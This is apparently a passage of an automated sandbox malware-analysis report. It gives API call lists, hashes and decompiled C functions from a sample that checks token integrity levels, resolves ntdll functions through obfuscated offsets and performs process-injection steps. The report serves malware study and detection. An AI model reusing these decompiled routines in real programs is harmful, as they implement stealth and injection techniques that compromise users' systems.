                                • Part of subcall function 053E4E7E: GetLastError.KERNEL32(?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EAB
                                • Part of subcall function 053E4E7E: VirtualQuery.KERNEL32(?,011075A8,0000001C,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EC2
                                • Part of subcall function 053E4E7E: VirtualProtect.KERNEL32(?,?,-2C9B417C,00000000,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EE7
                              • GetLastError.KERNEL32(00000000,00000004,053EF518,?,053EF4B4,00000000,00000002,053EC578,0000001C,053D496D,00000002,?,00000001,?,053EF514,?), ref: 053CAF38
                                • Part of subcall function 053D4B11: lstrlen.KERNEL32(?,00000004,053CB24B,00000004,00000000), ref: 053D4B49
                                • Part of subcall function 053D4B11: lstrcpy.KERNEL32(00000000,?), ref: 053D4B60
                                • Part of subcall function 053D4B11: StrChrA.SHLWAPI(00000000,0000002E), ref: 053D4B69
                                • Part of subcall function 053D4B11: GetModuleHandleA.KERNEL32(00000000), ref: 053D4B87
                              • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000000,00000000,00000004,053EF518,?,053EF4B4), ref: 053CAEB6
                              • VirtualProtect.KERNEL32(00000000,00000004,053EF518,053EF518,?,00000000,00000000,00000004,053EF518,?,053EF4B4,00000000,00000002,053EC578,0000001C,053D496D), ref: 053CAED1
                              • RtlEnterCriticalSection.NTDLL(053F0460), ref: 053CAEF5
                              • RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053CAF13
                                • Part of subcall function 053E4E7E: SetLastError.KERNEL32(?,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EF0
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                              • String ID:
                              • API String ID: 899430048-3916222277
                              • Opcode ID: 80ac21a98713566d1b8433817530cd587c14a5cfdc9778eda9e9a7a4f946f27f
                              • Instruction ID: 3c026446d0e41af270b4c01c74806ad2993afd5737d86babd34fe197337b82b3
                              • Opcode Fuzzy Hash: 80ac21a98713566d1b8433817530cd587c14a5cfdc9778eda9e9a7a4f946f27f
                              • Instruction Fuzzy Hash: C7414AB1900619AFDB11DF68C848AAEBFF8FF48310F148159F815AB290DB70E950CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D43EF, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E67CD: GetProcAddress.KERNEL32(?,00000318), ref: 053E67F2
                                • Part of subcall function 053E67CD: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 053E680E
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 053D4428
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 053D4513
                                • Part of subcall function 053E67CD: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 053E6978
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 053D445E
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 053D446A
                              • lstrcmpi.KERNEL32(?,00000000), ref: 053D44A7
                              • StrChrA.SHLWAPI(?,0000002E), ref: 053D44B0
                              • lstrcmpi.KERNEL32(?,00000000), ref: 053D44C2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                              • String ID:
                              • API String ID: 3901270786-0
                              • Opcode ID: 471b3346cfdb05a8c0baa601c8e2ddd16f4061e4ed88adf681f7755c4c42d73b
                              • Instruction ID: eea5b88aa60860a013b31b8a594b9e9d91121afc8da631774d4b4bc7b0cac78c
                              • Opcode Fuzzy Hash: 471b3346cfdb05a8c0baa601c8e2ddd16f4061e4ed88adf681f7755c4c42d73b
                              • Instruction Fuzzy Hash: AA318D72508311ABD721CF11E845B2BFBF9FF88B54F010919F985AA280D7B4E954CAB6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D9BAE, Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053C2E31: memset.NTDLL ref: 053C2E3B
                              • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,053C8ECE,?,00000000), ref: 053D9C48
                              • SetEvent.KERNEL32(00000000,?,053C8ECE,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053D9C55
                              • Sleep.KERNEL32(00000BB8,?,053C8ECE,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053D9C60
                              • ResetEvent.KERNEL32(00000000,?,053C8ECE,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053D9C67
                              • CloseHandle.KERNEL32(00000000,?,053C8ECE,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053D9C6E
                              • GetShellWindow.USER32 ref: 053D9C79
                              • GetWindowThreadProcessId.USER32(00000000), ref: 053D9C80
                                • Part of subcall function 053C33D9: RegCloseKey.ADVAPI32(?,?,?), ref: 053C345C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                              • String ID:
                              • API String ID: 53838381-0
                              • Opcode ID: a8eaddf1f2d807889735469da5993ad79eb91ee8a4a701abb8606ec97c5504d5
                              • Instruction ID: 9487b4290c505b271332ce89d5ef997da60542b9557e309fd9d8056e4b5b3e33
                              • Opcode Fuzzy Hash: a8eaddf1f2d807889735469da5993ad79eb91ee8a4a701abb8606ec97c5504d5
                              • Instruction Fuzzy Hash: 62216077214218ABC225ABAAAC4EF2BBFADABC9715F054009F50B9F141CE7558008B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D4DCF, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D4DCF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x49dd294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E049D55DC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E049D6DFA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                              0x049d4ddc
                              0x049d4de3
                              0x049d4dea
                              0x049d4dfe
                              0x049d4e09
                              0x049d4e21
                              0x049d4e2e
                              0x049d4e31
                              0x049d4e36
                              0x049d4e41
                              0x049d4e45
                              0x049d4e54
                              0x049d4e58
                              0x049d4e74
                              0x049d4e74
                              0x049d4e78
                              0x049d4e78
                              0x049d4e7d
                              0x049d4e81
                              0x049d4e87
                              0x049d4e88
                              0x049d4e8f
                              0x049d4e95

                              APIs
                              • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 049D4E01
                              • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 049D4E21
                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 049D4E31
                              • CloseHandle.KERNEL32(00000000), ref: 049D4E81
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 049D4E54
                              • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 049D4E5C
                              • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 049D4E6C
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                              • String ID:
                              • API String ID: 1295030180-0
                              • Opcode ID: a73ab3bac372690e26098ff6ceca68415aeb3a25d1a59b993b4a81ca287d36b0
                              • Instruction ID: 37ca8be9cb0c80579f96800d3de84d58e9ce6a992dd1dc39528f65152a647f8d
                              • Opcode Fuzzy Hash: a73ab3bac372690e26098ff6ceca68415aeb3a25d1a59b993b4a81ca287d36b0
                              • Instruction Fuzzy Hash: 38214875900218FFEB009FA4ED48EAEBFBDEB48314F0041B6E900A6150C7759E55DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D3B45, Relevance: 9.1, APIs: 6, Instructions: 123threadsynchronizationinjectionCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 053D3B68
                                • Part of subcall function 053C54B6: GetModuleHandleA.KERNEL32(?,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C54D7
                                • Part of subcall function 053C54B6: GetProcAddress.KERNEL32(00000000,?), ref: 053C54F0
                                • Part of subcall function 053C54B6: OpenProcess.KERNEL32(00000400,00000000,053D3B88,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C550D
                                • Part of subcall function 053C54B6: IsWow64Process.KERNEL32(00000000,00000000,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C551E
                                • Part of subcall function 053C54B6: CloseHandle.KERNEL32(00000000,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C5531
                              • ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,053F01F4,?,00000000), ref: 053D3C21
                              • WaitForSingleObject.KERNEL32(00000064), ref: 053D3C2F
                              • SuspendThread.KERNEL32(?), ref: 053D3C42
                                • Part of subcall function 053CD551: NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 053CD7CD
                                • Part of subcall function 053CD551: memset.NTDLL ref: 053CD7F5
                              • ResumeThread.KERNEL32(?), ref: 053D3CC4
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSectionSingleSuspendUnmapViewWaitWow64
                              • String ID:
                              • API String ID: 664769717-0
                              • Opcode ID: 4cd09be1dba08965b4d9f63c7fae1a2a46111086fa0e84de566a321cb98a7581
                              • Instruction ID: 142d775d46476aaf66a377dcfc3b614f94cab985464c9dd475b2c2e26f2b11eb
                              • Opcode Fuzzy Hash: 4cd09be1dba08965b4d9f63c7fae1a2a46111086fa0e84de566a321cb98a7581
                              • Instruction Fuzzy Hash: 38418072A0020CABDF22DF54ED88EAEBBBAFB04300F144869F91697150DB75DE55CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6FB2, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 049D4176: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058189D4,049D6FE2,?,?,?,?,?,?,?,?,?,?,?,049D6FE2), ref: 049D4242
                                • Part of subcall function 049D5F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 049D5FAF
                                • Part of subcall function 049D5F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 049D5FE0
                              • SysAllocString.OLEAUT32(00000000), ref: 049D700E
                              • SysAllocString.OLEAUT32(0070006F), ref: 049D7022
                              • SysAllocString.OLEAUT32(00000000), ref: 049D7034
                              • SysFreeString.OLEAUT32(00000000), ref: 049D7098
                              • SysFreeString.OLEAUT32(00000000), ref: 049D70A7
                              • SysFreeString.OLEAUT32(00000000), ref: 049D70B2
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                              • String ID:
                              • API String ID: 2831207796-0
                              • Opcode ID: 3ff311036757d2d27e30fee969b223e2e94b8687a27deb4a9f16b5f57c2c77ba
                              • Instruction ID: f2614c08c5c6e68a84ebedbf2acf195c9da7f5ab62121363ae8387fd908c37fb
                              • Opcode Fuzzy Hash: 3ff311036757d2d27e30fee969b223e2e94b8687a27deb4a9f16b5f57c2c77ba
                              • Instruction Fuzzy Hash: 1B313D32900609AFDF01DFF8C844A9EBBBAAF49310F158475ED10EB160DB75AD45CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CC708, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,053EF4B4,00000000,?,053EC588,00000018,053E3641,?,00000002,053EF518,00000003,053EF514,00000000,011075A8), ref: 053CC74B
                              • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,011075A8,?,?,053EF4B4,00000000,?,053EC588,00000018,053E3641), ref: 053CC7D6
                              • RtlEnterCriticalSection.NTDLL(053F0460), ref: 053CC7FE
                              • RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053CC81C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                              • String ID:
                              • API String ID: 3666628472-0
                              • Opcode ID: 4f71c372e52c51d54d4113b849ec839a92882928caacf5c9efb840df5eb979bd
                              • Instruction ID: be13fdbb8292849608fc6e1aa40c2858879acafc24cd25d9b72cf4bb82ecacfb
                              • Opcode Fuzzy Hash: 4f71c372e52c51d54d4113b849ec839a92882928caacf5c9efb840df5eb979bd
                              • Instruction Fuzzy Hash: F2410771A00719AFCB11DF65C888AAEBBF9BF48700B108559E52AEB650DB709D51CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6CE5, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D6CE5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E049D55DC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x49dd2b8; // 0xe3a5a8
					_t1 = _t23 + 0x49de11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x49dd2b8; // 0xe3a5a8
					_t2 = _t26 + 0x49de782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E049D6DFA(_t54);
					} else {
						_t30 =  *0x49dd2b8; // 0xe3a5a8
						_t5 = _t30 + 0x49de76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x49dd2b8; // 0xe3a5a8
							_t7 = _t33 + 0x49de4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x49dd2b8; // 0xe3a5a8
								_t9 = _t36 + 0x49de406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x49dd2b8; // 0xe3a5a8
									_t11 = _t39 + 0x49de792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E049D7562(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                              0x049d6cf4
                              0x049d6cf8
                              0x049d6dba
                              0x049d6cfe
                              0x049d6cfe
                              0x049d6d03
                              0x049d6d16
                              0x049d6d18
                              0x049d6d1d
                              0x049d6d25
                              0x049d6d2c
                              0x049d6d30
                              0x049d6d33
                              0x049d6db2
                              0x049d6db3
                              0x049d6d35
                              0x049d6d35
                              0x049d6d3a
                              0x049d6d42
                              0x049d6d46
                              0x049d6d49
                              0x00000000
                              0x049d6d4b
                              0x049d6d4b
                              0x049d6d50
                              0x049d6d58
                              0x049d6d5c
                              0x049d6d5f
                              0x00000000
                              0x049d6d61
                              0x049d6d61
                              0x049d6d66
                              0x049d6d6e
                              0x049d6d72
                              0x049d6d75
                              0x00000000
                              0x049d6d77
                              0x049d6d77
                              0x049d6d7c
                              0x049d6d84
                              0x049d6d88
                              0x049d6d8b
                              0x00000000
                              0x049d6d8d
                              0x049d6d93
                              0x049d6d98
                              0x049d6d9f
                              0x049d6da6
                              0x049d6da9
                              0x00000000
                              0x049d6dab
                              0x049d6dae
                              0x049d6dae
                              0x049d6da9
                              0x049d6d8b
                              0x049d6d75
                              0x049d6d5f
                              0x049d6d49
                              0x049d6d33
                              0x049d6dc8

                              APIs
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,049D87BD,?,?,?,?,00000000,00000000), ref: 049D6D0A
                              • GetProcAddress.KERNEL32(00000000,7243775A), ref: 049D6D2C
                              • GetProcAddress.KERNEL32(00000000,614D775A), ref: 049D6D42
                              • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049D6D58
                              • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049D6D6E
                              • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049D6D84
                                • Part of subcall function 049D7562: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,049D6DA4), ref: 049D75BF
                                • Part of subcall function 049D7562: memset.NTDLL ref: 049D75E1
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: 37a417933cc3d5ab56ffc5e8660b08e38e3a5a9d3fcb2692b395bad732446ed0
                              • Instruction ID: 75245d50c457eb3b48c2bed684ad7ac4b18c51fb5e8e9762b694e887651eb081
                              • Opcode Fuzzy Hash: 37a417933cc3d5ab56ffc5e8660b08e38e3a5a9d3fcb2692b395bad732446ed0
                              • Instruction Fuzzy Hash: 2F2171B250160AAFDB50DF68DC44E6A7BFCEB48344B018635E50ACB258E774ED458B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C9704, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,053CD660,?,?,053D3C99,?,00000000), ref: 053C9729
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C974B
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C9761
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C9777
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C978D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C97A3
                                • Part of subcall function 053D963A: NtCreateSection.NTDLL(053D3C99,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 053D9697
                                • Part of subcall function 053D963A: memset.NTDLL ref: 053D96BB
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: b68bfb20410e34b7a7d7bffbb0c9c19ac4e97fcc8e01d487ec782d06109568c7
                              • Instruction ID: 496ddc3a70f90fbbfde38bb436fd80db6bd0eddee58860eb5927ef05186e1bbd
                              • Opcode Fuzzy Hash: b68bfb20410e34b7a7d7bffbb0c9c19ac4e97fcc8e01d487ec782d06109568c7
                              • Instruction Fuzzy Hash: D9212AB651120EEFD710DFA9DC89E5A7BECFB04340B01456AF806CB241E770EA008B70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C3475, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                              Download Yara Rule
                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,00000000,?,053F01F8,053C10B6), ref: 053C348C
                              • QueueUserAPC.KERNEL32(?,00000000,?), ref: 053C34A1
                              • GetLastError.KERNEL32(00000000), ref: 053C34AC
                              • TerminateThread.KERNEL32(00000000,00000000), ref: 053C34B6
                              • CloseHandle.KERNEL32(00000000), ref: 053C34BD
                              • SetLastError.KERNEL32(00000000), ref: 053C34C6
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                              • String ID:
                              • API String ID: 3832013932-0
                              • Opcode ID: 79dcb1adbc9198d28d2bea747772b88bf28d86af8a822923a1a33fc34544a8d1
                              • Instruction ID: 54462f50dcd36b27d3498e86436943e5afd368263cca93f02db401884d409c9e
                              • Opcode Fuzzy Hash: 79dcb1adbc9198d28d2bea747772b88bf28d86af8a822923a1a33fc34544a8d1
                              • Instruction Fuzzy Hash: 7BF01C72225221BFD7321FA4AC0EF5FBFADFF09751F418808F6059D190CB6589108BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D48E5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 88%
                              			E049D48E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x49dd36c);
					_t91 = 0x80000002;
					L6:
					_t59 = E049D65F6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E049D691B(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E049D6DFA(_a8);
						goto L29;
					}
					_t64 =  *0x49dd2b0; // 0x5819b78
					_t16 = _t64 + 0xc; // 0x5819c46
					_t65 = E049D65F6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d049dc0, executed
						_t67 = E049D6E41(_t97,  *_t33, _t91, _a8,  *0x49dd364,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x49dd2b8; // 0xe3a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x49dea23; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x49de8cb; // 0x55434b48
								_t69 = _t34;
							}
							if(E049D5D44(_t69,  *0x49dd364,  *0x49dd368,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x49dd2b8; // 0xe3a5a8
									_t44 = _t71 + 0x49de83e; // 0x74666f53
									_t73 = E049D65F6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d049dc0
										E049D4FA0( *_t47, _t91, _a8,  *0x49dd368, _a24);
										_t49 = _t101 + 0x10; // 0x3d049dc0
										E049D4FA0( *_t49, _t91, _t99,  *0x49dd360, _a16);
										E049D6DFA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d049dc0
									E049D4FA0( *_t40, _t91, _a8,  *0x49dd368, _a24);
									_t43 = _t101 + 0x10; // 0x3d049dc0, executed
									E049D4FA0( *_t43, _t91, _a8,  *0x49dd360, _a16); // executed
								}
								if( *_t101 != 0) {
									E049D6DFA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d049dc0, executed
					_t81 = E049D5607( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d049dc0
							E049D6E41(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E049D6DFA(_t100);
						_t98 = _a16;
					}
					E049D6DFA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E049DAA99(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x49dd36c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                              0x049d48e5
                              0x049d48ee
                              0x049d48f5
                              0x049d48fa
                              0x049d4967
                              0x049d496d
                              0x049d4972
                              0x049d4979
                              0x049d4980
                              0x049d4983
                              0x049d4aee
                              0x049d4af5
                              0x049d4af5
                              0x049d4afa
                              0x049d4afc
                              0x049d4afc
                              0x049d4b05
                              0x049d4b05
                              0x049d4989
                              0x049d498e
                              0x049d4995
                              0x049d4ae4
                              0x049d4ae7
                              0x00000000
                              0x049d4ae7
                              0x049d499b
                              0x049d49a0
                              0x049d49a3
                              0x049d49aa
                              0x049d49ad
                              0x049d49f6
                              0x049d49f6
                              0x049d4a09
                              0x049d4a0c
                              0x049d4a13
                              0x049d4a1b
                              0x049d4a20
                              0x049d4a2a
                              0x049d4a2a
                              0x049d4a22
                              0x049d4a22
                              0x049d4a22
                              0x049d4a22
                              0x049d4a4c
                              0x049d4a54
                              0x049d4a82
                              0x049d4a87
                              0x049d4a8e
                              0x049d4a93
                              0x049d4a97
                              0x049d4ac9
                              0x049d4a99
                              0x049d4aa6
                              0x049d4aa9
                              0x049d4ab9
                              0x049d4abc
                              0x049d4ac2
                              0x049d4ac2
                              0x049d4a56
                              0x049d4a63
                              0x049d4a66
                              0x049d4a78
                              0x049d4a7b
                              0x049d4a7b
                              0x049d4ad3
                              0x049d4adf
                              0x049d4ad5
                              0x049d4ad8
                              0x049d4ad8
                              0x049d4ad3
                              0x049d4a4c
                              0x00000000
